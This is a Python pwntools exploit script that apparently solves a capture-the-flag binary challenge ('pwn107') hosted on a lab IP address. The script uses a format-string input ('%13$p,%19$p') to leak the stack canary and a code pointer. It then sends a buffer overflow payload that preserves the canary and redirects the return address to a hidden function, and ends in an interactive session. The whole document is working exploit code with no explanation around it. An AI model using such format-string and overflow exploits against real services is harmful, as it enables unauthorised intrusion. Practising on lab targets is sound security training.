20 lines
579 B
Python
20 lines
579 B
Python
|
#!/usr/bin/env python
|
||
|
|
|
||
|
|
from pwn import *
|
||
|
|
from time import sleep
|
||
|
|
|
||
|
|
|
||
|
|
#elf = context.binary = ELF('./pwn107.pwn107')
|
||
|
|
#p = process()
|
||
|
|
p = remote('10.10.216.4', 9007)
|
||
|
|
sleep(1)
|
||
|
|
p.sendline(b'%13$p,%19$p') # No. on stack. 1st: canary, 2nd: pointer to main function
|
||
|
|
sleep(1)
|
||
|
|
addresses = (p.recv().split())[62].decode().split(',')
|
||
|
|
print(addresses)
|
||
|
|
# Payload: Buffer + canary content + bsp + return pointer filled with address of the hidden function
|
||
|
|
payload = b'A' * 24 + p64(int(addresses[0],16)) + b'B' * 8 + p64(int(addresses[1], 16) - 0x45)
|
||
|
|
p.sendline(payload)
|
||
|
|
sleep(1)
|
||
|
|
p.interactive()
|